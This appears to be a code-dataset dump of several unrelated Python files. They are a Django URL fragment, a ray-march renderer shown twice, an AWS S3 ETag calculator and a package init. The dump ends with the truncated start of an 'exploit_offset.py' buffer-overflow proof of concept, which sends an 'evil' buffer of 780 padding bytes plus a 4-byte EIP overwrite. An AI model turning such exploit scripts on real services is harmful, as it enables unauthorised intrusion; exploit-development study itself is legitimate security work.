url(r'^(?P<strategy_name>[-\w]+)/(?P<pk>\d+)/$', views.AjaxBaseSerializedView.as_view(),
name='django-easy-ajax-selector'),
]
| 0 | 0 | 0 |
5887dcecd81a99876c5c5c6ee478e6117c74d657 | 23,348 | py | Python | rayMarchRenderer.py | s-neilson/Python-ray-march-renderer | c3850336686a4853c9658f2dff49566e71872470 | [
"MIT"
] | null | null | null | rayMarchRenderer.py | s-neilson/Python-ray-march-renderer | c3850336686a4853c9658f2dff49566e71872470 | [
"MIT"
] | null | null | null | rayMarchRenderer.py | s-neilson/Python-ray-march-renderer | c3850336686a4853c9658f2dff49566e71872470 | [
"MIT"
] | null | null | null | import copy
import math
import numpy
from tqdm import tqdm
import matplotlib.pyplot as plt
#A class for three-dimentional vector operations; using numpy arrays and their operations was found to be slower.
#Returns the unit vector pointing from the location represented by fromVector to the location represented by toVector.
#Returns the direction that the original ray used in rayMarch should be in in order to correspond to a certain pixel in the image given by the coordinates
#pixelX,pixelY. The camera is assumed to be a pinhole comera with an infinitely small aperture.
#An infinite flat plane described by the equation ax+by+cz+d=0
#Determines the total intensity of red, green and blue light impacting point rayOrigin using the ray marching algorithm.
# Camera and image configuration. The image is imageWidth x imageHeight pixels;
# the camera sits at the origin looking towards +z with a 90-degree field of view.
aspectRatio=1.0
imageHeight=50
imageWidth=int(aspectRatio*imageHeight)
fieldOfView=math.pi/2.0
cameraLocation=Vector3D(0.0,0.0,0.0)
screenDistance=(0.5*aspectRatio)/(math.tan(fieldOfView/2.0)) #The screen is assumed to have a height of 1 unit, meaning that it's width is equal to "aspectRatio".
imageData=numpy.zeros(shape=(imageHeight,imageWidth,3))
# Ray-marching termination parameters: hit tolerance, step budget, travel
# distance cap and the maximum reflection/refraction recursion depth.
minimumCollisionDistance=0.005
maximumRayMarchStepCount=400
maximumRayMarchDistance=300.0
maximumRecursiveDepth=7
minimiseDiffuseInterreflections=True
#The scene is created below: five walls plus an emissive ceiling, two
#non-diffuse (refractive/reflective) spheres, a small diffuse sphere and a
#tiny but very bright point-like sphere light.
ground=Plane(a=0.0,b=1.0,c=0.0,location=Vector3D(0.0,-2.0,0.0),colour=Vector3D(255.0,70.0,40.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
backWall=Plane(a=0.0,b=0.0,c=-1.0,location=Vector3D(0.0,0.0,40.0),colour=Vector3D(170.0,180.0,250.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
leftWall=Plane(a=1.0,b=0.0,c=0.0,location=Vector3D(-20.0,0.0,-0.0),colour=Vector3D(230.0,240.0,50.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
rightWall=Plane(a=-1.0,b=0.0,c=0.0,location=Vector3D(20.0,0.0,20.0),colour=Vector3D(230.0,240.0,50.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
frontWall=Plane(a=0.0,b=0.0,c=1.0,location=Vector3D(0.0,0.0,-40.0),colour=Vector3D(100.0,190.0,170.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
topLight=Plane(a=0.0,b=-1.0,c=0.0,location=Vector3D(0.0,30.0,0.0),colour=Vector3D(255.0,255.0,255.0),diffuse=True,refractiveIndex=1.0,brightness=1.0)
sphere1=Sphere(location=Vector3D(-2.0,-0.25,5.0),radius=1.5,colour=Vector3D(215.0,250.0,190.0),diffuse=False,refractiveIndex=1.5,brightness=0.0)
sphere2=Sphere(location=Vector3D(0.5,1.0,6.0),radius=1.2,colour=Vector3D(255.0,255.0,255.0),diffuse=False,refractiveIndex=100.0,brightness=0.0)
sphere3=Sphere(location=Vector3D(1.5,0.6,3.0),radius=0.5,colour=Vector3D(80.0,40.0,120.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
sphereLight1=Sphere(location=Vector3D(15.0,8.0,-5.0),radius=0.01,colour=Vector3D(255.0,255.0,255.0),diffuse=True,refractiveIndex=1.0,brightness=2500000.0)
objectList=[ground,backWall,leftWall,rightWall,frontWall,topLight,sphere1,sphere2,sphere3,sphereLight1]
#These loop through every pixel in the image, march one primary ray per pixel
#and accumulate the returned RGB intensity (tqdm shows per-column progress).
for pixelX in tqdm(range(0,imageWidth)):
    for pixelY in range(0,imageHeight):
        currentPixelColour=Vector3D(0.0,0.0,0.0)
        rayDirection=getCameraRayUnitVector(pixelX=pixelX,pixelY=pixelY,imageWidth=imageWidth,imageHeight=imageHeight,cameraLocation=cameraLocation,
                                            aspectRatio=aspectRatio,screenDistance=screenDistance)
        currentPixelColour+=marchRay(currentRecursiveDepth=0,rayOrigin=cameraLocation,originObject=None,rayDirection=rayDirection,objectList=objectList,
            minimumCollisionDistance=minimumCollisionDistance,maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
            maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
        imageData[(imageHeight-1)-pixelY,pixelX,:]=[currentPixelColour.x,currentPixelColour.y,currentPixelColour.z] #Y axis is inverted so the image is displayed the correct way up while using imshow().
#The RGB intensity values are scaled from 0 to 1 so they can be interpreted correctly by the imshow() function.
imageDataMaximumValue=numpy.amax(imageData)
imageData/=imageDataMaximumValue
plt.imshow(imageData)
plt.show() | 64.6759 | 229 | 0.710853 | import copy
import math
import numpy
from tqdm import tqdm
import matplotlib.pyplot as plt
#A class for three-dimentional vector operations; using numpy arrays and their operations was found to be slower.
class Vector3D():
    """Three-dimensional vector used for positions, directions and RGB colours."""
    # Class-level defaults; __init__ overwrites them on every instance.
    x = 0.0
    y = 0.0
    z = 0.0

    def __init__(self, x, y, z):
        self.x = x
        self.y = y
        self.z = z

    def __add__(self, b):
        return Vector3D(self.x + b.x, self.y + b.y, self.z + b.z)

    def __sub__(self, b):
        return Vector3D(self.x - b.x, self.y - b.y, self.z - b.z)

    def __mul__(self, b):
        # isinstance also accepts int/float subclasses (e.g. bool, numpy
        # scalars), which the previous type(b)==float check rejected.
        if isinstance(b, (float, int)):
            return Vector3D(self.x * b, self.y * b, self.z * b)  # Scalar multiplication
        return Vector3D(self.x * b.x, self.y * b.y, self.z * b.z)  # Element wise multiplication

    def __truediv__(self, b):
        if isinstance(b, (float, int)):
            return Vector3D(self.x / b, self.y / b, self.z / b)  # Scalar division
        # Bug fix: the element-wise result was constructed but never returned,
        # so vector/vector division previously evaluated to None.
        return Vector3D(self.x / b.x, self.y / b.y, self.z / b.z)  # Element wise division

    def dotProduct(self, b):
        return (self.x * b.x) + (self.y * b.y) + (self.z * b.z)

    def crossProduct(self, b):
        """Right-handed cross product of self with b."""
        newX = (self.y * b.z) - (self.z * b.y)
        newY = (self.z * b.x) - (self.x * b.z)
        newZ = (self.x * b.y) - (self.y * b.x)
        return Vector3D(newX, newY, newZ)

    def lengthSquared(self):
        return (self.x ** 2) + (self.y ** 2) + (self.z ** 2)

    def length(self):
        return math.sqrt(self.lengthSquared())

    def getUnitVector(self):
        """Return a new vector with the same direction and unit length."""
        return self / self.length()
#Unit vector pointing from the location fromVector towards the location toVector.
def getUnitVectorPointToPoint(toVector,fromVector):
    return (toVector - fromVector).getUnitVector()
#Maps an image pixel (pixelX,pixelY) to the direction of its primary camera ray.
#The camera is modelled as a pinhole with an infinitely small aperture: the ray
#travels from cameraLocation through the matching point on a virtual screen.
def getCameraRayUnitVector(pixelX,pixelY,imageWidth,imageHeight,cameraLocation,aspectRatio,screenDistance):
    #The virtual screen has height 1 and width aspectRatio, screenDistance in front of the camera.
    screenPointZ=screenDistance+cameraLocation.z
    screenPointX=cameraLocation.x+numpy.interp(x=pixelX,xp=[0,imageWidth],fp=[-0.5*aspectRatio,0.5*aspectRatio]) #Pixel x ordinate -> screen x ordinate.
    screenPointY=cameraLocation.y+numpy.interp(x=pixelY,xp=[0,imageHeight],fp=[-0.5,0.5]) #Pixel y ordinate -> screen y ordinate.
    screenPoint=Vector3D(float(screenPointX),float(screenPointY),float(screenPointZ))
    return getUnitVectorPointToPoint(screenPoint,cameraLocation)
class SceneObject():
    """Base class for renderable scene objects; holds shared material properties."""
    location=0.0 #World-space position; the scene setup assigns a Vector3D here
    colour=None #Surface colour as a Vector3D of RGB intensities (0-255 in the scene setup)
    diffuse=True #True for matte surfaces; False presumably enables reflection/refraction - confirm in marchRay
    refractiveIndex=1.0 #Refractive index used by the refraction methods below
    brightness=0.0 #Light-emission strength; 0 for non-emissive objects
    def getNormalUnitVector(self,collisionPoint,rayIsInside):
        #Default surface normal (straight up); subclasses presumably override this
        #with the true normal at collisionPoint - rayIsInside is unused here.
        return Vector3D(0.0,1.0,0.0)
def getReflectionVector(self,incomingUnitVector,normalUnitVector):
return incomingUnitVector-((normalUnitVector*(normalUnitVector.dotProduct(incomingUnitVector)))*2.0)
    #Returns the angle that the incoming ray makes to the normal using the cosine rule.
    #For two unit vectors a and b, |a-b|^2 = 2 - 2*cos(theta), hence
    #cos(theta) = 1 - |a-b|^2 / 2; this recovers the angle without a dot product.
    def getIncomingAngle(self,negativeIncomingUnitVector,normalUnitVector):
        negativeIncomingNormalDifferenceVector=negativeIncomingUnitVector-normalUnitVector
        cosIncomingAngle=1.0-(0.5*negativeIncomingNormalDifferenceVector.lengthSquared())
        return math.acos(cosIncomingAngle)
def isAboveCriticalAngle(self,incomingAngle,n1,n2): #Determines whether total internal reflection is occuring.
if(n2>n1):
return False #Total internal reflection only occurs when light is in a higher refractive index material and collides with an interface seperating a lower refractive index material.
return incomingAngle>=math.asin(n2/n1)
#Returns the refractive indices for both sides of the interface during a refractive process
def getRefractiveIndices(self,rayIsInside):
#It is assumed that refraction only occurs between this object and empty space (refractive index of 1.0), not between this
#object and another object embedded inside it.
n1=1.0 if(rayIsInside==False) else self.refractiveIndex
n2=self.refractiveIndex if(rayIsInside==False) else 1.0
return n1,n2
#Returns the reflection and refraction coefficients using Shlick's approximation (https://en.wikipedia.org/wiki/Schlick%27s_approximation) of the Frensel equations.
def getReflectionAndRefractionCoefficients(self,incomingAngle,n1,n2):
verticalReflectionIntensityFactor=((n1-n2)/(n1+n2))**2.0 #Reflection intensity for a ray of light travelling in the negative normal direction.
reflectionIntensityFactor=verticalReflectionIntensityFactor+((1-verticalReflectionIntensityFactor)*((1-math.cos(incomingAngle))**5.0))
return reflectionIntensityFactor,1.0-reflectionIntensityFactor
#Returns the information regarding reflection and refraction that occurs when rays of light transition between an interface between two refractive indices.
#Returns information in the following format: reflection vector, refraction vector,reflection intensity,refraction intensity.
def getReflectionAndRefraction(self,rayOrigin,collisionPoint,rayIsInside):
incomingUnitVector=getUnitVectorPointToPoint(collisionPoint,rayOrigin)
negativeIncomingUnitVector=incomingUnitVector*(-1.0)
normalUnitVector=self.getNormalUnitVector(collisionPoint,rayIsInside)
reflectionVector=self.getReflectionVector(incomingUnitVector=incomingUnitVector,normalUnitVector=normalUnitVector)
incomingAngle=self.getIncomingAngle(negativeIncomingUnitVector=negativeIncomingUnitVector,normalUnitVector=normalUnitVector)
n1,n2=self.getRefractiveIndices(rayIsInside=rayIsInside)
if(self.isAboveCriticalAngle(incomingAngle=incomingAngle,n1=n1,n2=n2)):
return reflectionVector,Vector3D(0.0,0.0,0.0),1.0,0.0 #No refraction occurs in this case; only total internal reflection.
negativeNormalUnitVector=normalUnitVector*(-1.0) #Used in construction of the final refracted vector
parallelVector=(negativeIncomingUnitVector.crossProduct(normalUnitVector)).crossProduct(normalUnitVector)
parallelUnitVector=parallelVector.getUnitVector() #Parallel to the surface of the object, used in construction of the final refracted vector.
sinRefractionAngle=(n1/n2)*math.sin(incomingAngle) #Calculated from Snell's law.
refractionAngle=math.asin(sinRefractionAngle)
#Below constructs the refraction vector from negativeNormalUnitVector and parallelUnitVector.
parallelUnitVectorFactor=math.tan(refractionAngle) #Assumes that the component of the refraction vector in the negative normal direction has a length of 1.
refractionVector=negativeNormalUnitVector+(parallelUnitVector*parallelUnitVectorFactor)
unitRefractionVector=refractionVector.getUnitVector()
reflectionIntensityFactor,refractionIntensityFactor=self.getReflectionAndRefractionCoefficients(incomingAngle=incomingAngle,n1=n1,n2=n2)
return reflectionVector,unitRefractionVector,reflectionIntensityFactor,refractionIntensityFactor
def isLight(self): #Returns if the brightness is positive, meaning that the object is a light.
return False if(self.brightness<=0.0) else True
class Plane(SceneObject):
    """An infinite flat plane described by the equation ax + by + cz + d = 0."""
    normalUnitVector = None
    d = 0.0

    def __init__(self, a, b, c, location, colour, diffuse, refractiveIndex, brightness):
        """Build the plane from its normal components and a point lying on it."""
        unitNormal = Vector3D(a, b, c).getUnitVector()  # point-normal definition of a plane
        self.normalUnitVector = unitNormal
        self.a = a
        self.b = b
        self.c = c
        self.location = location
        # d follows from requiring `location` to satisfy the plane equation.
        self.d = (-1.0) * unitNormal.dotProduct(location)
        self.colour = colour.getUnitVector()
        self.diffuse = diffuse
        self.refractiveIndex = refractiveIndex
        self.brightness = brightness

    def getNormalUnitVector(self, collisionPoint, rayIsInside):
        """Plane normal, flipped when the collision comes from the back side."""
        if rayIsInside == False:
            return self.normalUnitVector
        return self.normalUnitVector * (-1.0)

    def SDF(self, collisionPoint):
        """Signed perpendicular distance from the point to the plane (normal is unit length)."""
        return self.normalUnitVector.dotProduct(collisionPoint) + self.d

    def getBrightness(self, point):
        """Constant emission everywhere for an illuminated infinite plane; never negative."""
        if self.brightness > 0.0:
            return self.brightness
        return 0.0
class Sphere(SceneObject):
    """A sphere scene object; when emissive it acts as an inverse-square light."""
    radius = 1.0

    def __init__(self, location, radius, colour, diffuse, refractiveIndex, brightness):
        """Store geometry and material; colour is normalised to a unit vector."""
        self.location = location
        self.radius = radius
        self.colour = colour.getUnitVector()
        self.diffuse = diffuse
        self.refractiveIndex = refractiveIndex
        self.brightness = brightness

    def getNormalUnitVector(self, collisionPoint, rayIsInside):
        """Outward normal (centre to surface point), flipped for internal collisions."""
        outwardNormal = getUnitVectorPointToPoint(collisionPoint, self.location)
        if rayIsInside == False:
            return outwardNormal
        return outwardNormal * (-1.0)

    def SDF(self, collisionPoint):
        """Signed distance to the surface; negative when the point is inside the sphere."""
        towardCentre = self.location - collisionPoint
        return towardCentre.length() - self.radius

    def getBrightness(self, point):
        """Inverse-square intensity at `point`; equals `brightness` at the sphere surface."""
        if self.brightness <= 0.0:
            return 0.0
        towardCentre = self.location - point
        return (self.brightness * (self.radius ** 2.0)) / towardCentre.lengthSquared()
#Determines the total intensity of red, green and blue light impacting point rayOrigin using the ray marching algorithm.
def marchRay(currentRecursiveDepth,objectList,originObject,rayOrigin,rayDirection,
             minimumCollisionDistance,maximumRayMarchStepCount,maximumRayMarchDistance,
             maximumRecursiveDepth,minimiseDiffuseInterreflections):
    """Ray-march from rayOrigin along rayDirection and return the incoming RGB
    intensity as a Vector3D.

    The ray is advanced by signed-distance steps until it either collides with the
    closest object (within minimumCollisionDistance), exceeds the step/distance
    budget, or the recursion budget is exhausted. Lights terminate the recursion;
    non-diffuse surfaces recurse into reflection + refraction rays weighted by
    Schlick coefficients; diffuse surfaces accumulate Lambertian contributions
    from light sources.

    originObject, when not None, is excluded from collision tests so a ray leaving
    an object's surface does not immediately re-collide with it.
    """
    if(currentRecursiveDepth>=maximumRecursiveDepth):
        return Vector3D(0.0,0.0,0.0) #The path to the camera via recursive calls of marchRay has become too long, no light is returned in this case.
    currentRayEnd=copy.deepcopy(rayOrigin) #Holds the current endpoint of the extended ray that begins at the point rayOrigin.
    currentStepCount=0
    while(True):
        if((currentStepCount>=maximumRayMarchStepCount) or (currentRayEnd.length()>=maximumRayMarchDistance)):
            return Vector3D(0.0,0.0,0.0) #The ray has not intersected with anything within a specified number of steps or ray extension distance; the ray may have gone outside of the scene. No light is returned in this case.
        closestObject=None
        closestObjectDistance=10e12 #Holds the distance to the closest object (initialised beyond any scene distance).
        closestObjectRayIsInside=False #Holds whether the ray would be colliding with closestObject from inside the object or not.
        for currentObject in objectList:
            if(currentObject==originObject): #If the current object being considered is the object that this call of rayMarch is being used on. Used during diffuse reflections.
                continue
            currentObjectDistance=currentObject.SDF(currentRayEnd) #The closest distance to the object is determined, with the sign determining what side the collision point is to the surface normals.
            currentObjectAbsoluteDistance=math.fabs(currentObjectDistance)
            if(currentObjectAbsoluteDistance<closestObjectDistance): #If a new closest object has been found to the ray end.
                closestObject=currentObject
                closestObjectDistance=currentObjectAbsoluteDistance
                closestObjectRayIsInside=False if(currentObjectDistance>=0.0) else True
        if(closestObjectDistance<=minimumCollisionDistance): #If the ray has collided with the closest object.
            if(closestObject.isLight()==True): #If the object is a light, its colour scaled by its brightness at the ray origin is returned.
                return closestObject.colour*closestObject.getBrightness(rayOrigin)
            #In some circumstances multiple objects may have collisions occuring at currentRayEnd at the same time. If this happens, a ray sent from one of these objects another
            #will need no iterations to collide, causing rayOrigin to equal currentRayEnd, meaning that the ray from one to the other will have zero length. To prevent this,
            #the collision point is offset backwards along the incoming by a distance greater than minimumCollisionDistance in order to ensure that a ray going
            #from this collided object always needs at least one iteration to collide with another object, ensuring that any ray emanating from the point rayOrigin has a non zero length.
            reflectionRayOriginOffsetVector=rayDirection*minimumCollisionDistance*(-1.1)
            reflectionRayOrigin=currentRayEnd+reflectionRayOriginOffsetVector
            if(closestObject.diffuse==False): #If the object reflects and refracts light.
                #If the ray is transitioning across the object's surface (either from inside to outside or outside to inside) the ray end is moved across the collision interface
                #so that the new ray will not initally collide with the object that it was generated from.
                closestObjectCollisionNormalUnitVector=closestObject.getNormalUnitVector(collisionPoint=currentRayEnd,rayIsInside=closestObjectRayIsInside)
                refractionRayOriginOffsetVector=closestObjectCollisionNormalUnitVector*minimumCollisionDistance*2.0*(-1.1)
                refractionRayOrigin=currentRayEnd+refractionRayOriginOffsetVector
                reflectionVector,refractionVector,reflectionIntensityFactor,refractionIntensityFactor=closestObject.getReflectionAndRefraction(rayOrigin=rayOrigin,
                                                                                                                                              collisionPoint=currentRayEnd,
                                                                                                                                              rayIsInside=closestObjectRayIsInside)
                #Recurse into both branch rays; their intensities are blended with the Schlick coefficients below.
                reflectionIntensity=marchRay(currentRecursiveDepth=currentRecursiveDepth+1,objectList=objectList,originObject=None,
                                             rayOrigin=reflectionRayOrigin,rayDirection=reflectionVector,minimumCollisionDistance=minimumCollisionDistance,
                                             maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
                                             maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
                refractionIntensity=marchRay(currentRecursiveDepth=currentRecursiveDepth+1,objectList=objectList,originObject=None,
                                             rayOrigin=refractionRayOrigin,rayDirection=refractionVector,minimumCollisionDistance=minimumCollisionDistance,
                                             maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
                                             maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
                finalIntensities=(reflectionIntensity*reflectionIntensityFactor)+(refractionIntensity*refractionIntensityFactor)
                return closestObject.colour*finalIntensities #The object's surface can reflect and refract red, green and blue light in different amounts.
            #The light reflects diffusely for the object.
            totalReflectedIntensity=Vector3D(0.0,0.0,0.0) #Carries the current sum of light intensity to be reflected off the object.
            for currentObject in objectList:
                if(currentObject==closestObject): #If the current object being considered is the object that this part of the function is being used on.
                    continue
                if((minimiseDiffuseInterreflections==True) and (currentObject.isLight()==False)): #Minimising diffuse interreflection means that diffuse objects will only try to use
                    #lights and objects in the way of lights as light sources. This simplification can significantly reduce the number of total calculations needed for calculating the colour of a single pixel in the final image.
                    continue
                lightDirectionUnitVector=getUnitVectorPointToPoint(currentObject.location,currentRayEnd)
                incomingIntensity=marchRay(currentRecursiveDepth=currentRecursiveDepth+1,objectList=objectList,originObject=closestObject,
                                           rayOrigin=reflectionRayOrigin,rayDirection=lightDirectionUnitVector,minimumCollisionDistance=minimumCollisionDistance,
                                           maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
                                           maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
                #The Lambertian reflectance model (https://en.wikipedia.org/wiki/Lambertian_reflectance) is used as a model for diffuse reflection.
                surfaceNormalVector=closestObject.getNormalUnitVector(currentRayEnd,False)
                reflectedIntensityScalingFactor=incomingIntensity*max(0.0,lightDirectionUnitVector.dotProduct(surfaceNormalVector))
                reflectedIntensity=closestObject.colour*reflectedIntensityScalingFactor #The object's colour determines how much red, green and blue light is reflected; presumably Vector3D multiplication here is per-component — confirm in Vector3D.
                totalReflectedIntensity+=reflectedIntensity #The intensity from the current light source is added to the total sum of reflected light intensity.
            return totalReflectedIntensity
        #No object intersections exist within a sphere centred at currentRayEnd with a radius of closestObjectDistance. The ray is therefore extended in rayDirection by
        #a distance slightly smaller than closestObjectDistance (smaller to ensure the ray end will not end up inside an object).
        currentRayEnd+=(rayDirection*0.98*closestObjectDistance)
        currentStepCount+=1
#----- Render settings -----
aspectRatio=1.0
imageHeight=50
imageWidth=int(aspectRatio*imageHeight)
fieldOfView=math.pi/2.0 #Horizontal field of view in radians (90 degrees).
cameraLocation=Vector3D(0.0,0.0,0.0)
screenDistance=(0.5*aspectRatio)/(math.tan(fieldOfView/2.0)) #The screen is assumed to have a height of 1 unit, meaning that it's width is equal to "aspectRatio".
imageData=numpy.zeros(shape=(imageHeight,imageWidth,3)) #Accumulates raw RGB intensities per pixel.
minimumCollisionDistance=0.005
maximumRayMarchStepCount=400
maximumRayMarchDistance=300.0
maximumRecursiveDepth=7
minimiseDiffuseInterreflections=True
#The scene is created below: a box of coloured walls, an illuminated ceiling plane,
#a refractive sphere, a highly reflective sphere, a diffuse sphere and a small bright spherical light.
ground=Plane(a=0.0,b=1.0,c=0.0,location=Vector3D(0.0,-2.0,0.0),colour=Vector3D(255.0,70.0,40.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
backWall=Plane(a=0.0,b=0.0,c=-1.0,location=Vector3D(0.0,0.0,40.0),colour=Vector3D(170.0,180.0,250.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
leftWall=Plane(a=1.0,b=0.0,c=0.0,location=Vector3D(-20.0,0.0,-0.0),colour=Vector3D(230.0,240.0,50.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
rightWall=Plane(a=-1.0,b=0.0,c=0.0,location=Vector3D(20.0,0.0,20.0),colour=Vector3D(230.0,240.0,50.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
frontWall=Plane(a=0.0,b=0.0,c=1.0,location=Vector3D(0.0,0.0,-40.0),colour=Vector3D(100.0,190.0,170.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
topLight=Plane(a=0.0,b=-1.0,c=0.0,location=Vector3D(0.0,30.0,0.0),colour=Vector3D(255.0,255.0,255.0),diffuse=True,refractiveIndex=1.0,brightness=1.0)
sphere1=Sphere(location=Vector3D(-2.0,-0.25,5.0),radius=1.5,colour=Vector3D(215.0,250.0,190.0),diffuse=False,refractiveIndex=1.5,brightness=0.0)
sphere2=Sphere(location=Vector3D(0.5,1.0,6.0),radius=1.2,colour=Vector3D(255.0,255.0,255.0),diffuse=False,refractiveIndex=100.0,brightness=0.0)
sphere3=Sphere(location=Vector3D(1.5,0.6,3.0),radius=0.5,colour=Vector3D(80.0,40.0,120.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
sphereLight1=Sphere(location=Vector3D(15.0,8.0,-5.0),radius=0.01,colour=Vector3D(255.0,255.0,255.0),diffuse=True,refractiveIndex=1.0,brightness=2500000.0)
objectList=[ground,backWall,leftWall,rightWall,frontWall,topLight,sphere1,sphere2,sphere3,sphereLight1]
#These loop through every pixel in the image, casting one primary ray per pixel.
for pixelX in tqdm(range(0,imageWidth)):
    for pixelY in range(0,imageHeight):
        currentPixelColour=Vector3D(0.0,0.0,0.0)
        rayDirection=getCameraRayUnitVector(pixelX=pixelX,pixelY=pixelY,imageWidth=imageWidth,imageHeight=imageHeight,cameraLocation=cameraLocation,
                                            aspectRatio=aspectRatio,screenDistance=screenDistance)
        currentPixelColour+=marchRay(currentRecursiveDepth=0,rayOrigin=cameraLocation,originObject=None,rayDirection=rayDirection,objectList=objectList,
                                     minimumCollisionDistance=minimumCollisionDistance,maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
                                     maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
        imageData[(imageHeight-1)-pixelY,pixelX,:]=[currentPixelColour.x,currentPixelColour.y,currentPixelColour.z] #Y axis is inverted so the image is displayed the correct way up while using imshow().
#The RGB intensity values are scaled from 0 to 1 so they can be interpreted correctly by the imshow() function.
imageDataMaximumValue=numpy.amax(imageData)
imageData/=imageDataMaximumValue
plt.imshow(imageData)
plt.show()
ce0779ba605786061035545a0272a055142dc5cc | 1,484 | py | Python | calc-s3-etag.py | aws-samples/calc-s3-etag | 09609ec170adce0ada5dfb73eb0f548f4d0dd3e2 | [
"MIT-0"
] | null | null | null | calc-s3-etag.py | aws-samples/calc-s3-etag | 09609ec170adce0ada5dfb73eb0f548f4d0dd3e2 | [
"MIT-0"
] | null | null | null | calc-s3-etag.py | aws-samples/calc-s3-etag | 09609ec170adce0ada5dfb73eb0f548f4d0dd3e2 | [
"MIT-0"
] | 1 | 2021-06-10T19:01:33.000Z | 2021-06-10T19:01:33.000Z | #// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#// SPDX-License-Identifier: MIT-0
import sys
import hashlib
# NOTE(review): this script calls calculate_s3_etag() without defining or
# importing it in this copy — presumably it is provided alongside; confirm.
if len(sys.argv) !=3:
    # Wrong argument count: print usage guidance and exit cleanly.
    print("Usage: calc-s3-etag.py {file} {multipart-transfer size}")
    print("")
    print("Multipart transfersize may be gotten by referencing the .aws/config file or by using the following example commands to examine a large object uploaded to the SBE")
    print("aws s3api head-object --bucket {bucketname} --key \"[prefix/]{objectname}\" --endpoint-url {url to SBE device including port}")
    print("take the resulting content length and divide it by the number after the dash in the Etag. Take that result and divide it by 1048576")
    print("the result will be slightly below the multi-part transfer chunk size measured in MB utilized in the transfer")
    sys.exit(0)
# The chunk-size argument is given in MiB; convert to bytes.
mychunksize=int(sys.argv[2]) * 1024 * 1024
print(calculate_s3_etag(sys.argv[1],mychunksize))
| 41.222222 | 174 | 0.66779 | #// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#// SPDX-License-Identifier: MIT-0
import sys
import hashlib
def calculate_s3_etag(file_path, chunk_size):
    """Compute the S3 ETag of *file_path* as produced by a multipart upload
    with parts of *chunk_size* bytes.

    Returns the ETag as a double-quoted string: a plain MD5 for files that fit
    in a single part, or 'md5(concatenated part digests)-<part count>' for
    multipart files.
    """
    part_hashes = []
    with open(file_path, 'rb') as handle:
        # Hash the file part by part, exactly as a multipart upload would.
        for chunk in iter(lambda: handle.read(chunk_size), b''):
            part_hashes.append(hashlib.md5(chunk))
    if not part_hashes:
        # Empty file: the ETag is the MD5 of zero bytes.
        return '"{}"'.format(hashlib.md5().hexdigest())
    if len(part_hashes) == 1:
        # Single part: the ETag is simply that part's MD5.
        return '"{}"'.format(part_hashes[0].hexdigest())
    # Multipart: MD5 the concatenation of the binary part digests and append
    # the part count after a dash.
    combined = hashlib.md5(b''.join(h.digest() for h in part_hashes))
    return '"{}-{}"'.format(combined.hexdigest(), len(part_hashes))
if len(sys.argv) !=3:
    # Wrong argument count: print usage guidance and exit cleanly.
    print("Usage: calc-s3-etag.py {file} {multipart-transfer size}")
    print("")
    print("Multipart transfersize may be gotten by referencing the .aws/config file or by using the following example commands to examine a large object uploaded to the SBE")
    print("aws s3api head-object --bucket {bucketname} --key \"[prefix/]{objectname}\" --endpoint-url {url to SBE device including port}")
    print("take the resulting content length and divide it by the number after the dash in the Etag. Take that result and divide it by 1048576")
    print("the result will be slightly below the multi-part transfer chunk size measured in MB utilized in the transfer")
    sys.exit(0)
# The chunk-size argument is given in MiB; convert to bytes.
mychunksize=int(sys.argv[2]) * 1024 * 1024
print(calculate_s3_etag(sys.argv[1],mychunksize))
| 532 | 0 | 23 |
72ce4745976e9c1bb7896987be9ec2993372dc7b | 173 | py | Python | startmicro/__init__.py | munisisazade/startmicro | 4c74f41a31a6bef9aaa09586628e8427a7d68851 | [
"MIT"
] | 1 | 2019-09-27T10:23:24.000Z | 2019-09-27T10:23:24.000Z | startmicro/__init__.py | munisisazade/startmicro | 4c74f41a31a6bef9aaa09586628e8427a7d68851 | [
"MIT"
] | 1 | 2020-09-01T06:50:19.000Z | 2020-09-01T06:50:19.000Z | startmicro/__init__.py | munisisazade/startmicro | 4c74f41a31a6bef9aaa09586628e8427a7d68851 | [
"MIT"
] | null | null | null | from startmicro.utils.version import get_version
VERSION = (0, 0, 6, 'alpha', 0)
__version__ = get_version(VERSION)
__author__ = "Munis Isazade <munisisazade@gmail.com>"
| 21.625 | 53 | 0.751445 | from startmicro.utils.version import get_version
VERSION = (0, 0, 6, 'alpha', 0)
__version__ = get_version(VERSION)
__author__ = "Munis Isazade <munisisazade@gmail.com>"
| 0 | 0 | 0 |
1b7fd39603cccc95e49b6ce348febb847840ef6b | 1,138 | py | Python | PoC1/exploit_offset.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | PoC1/exploit_offset.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | PoC1/exploit_offset.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import socket
try:
print "\n Sending ""evil"" buffer..."
padding = "A" * 780
eip = "B" * 4
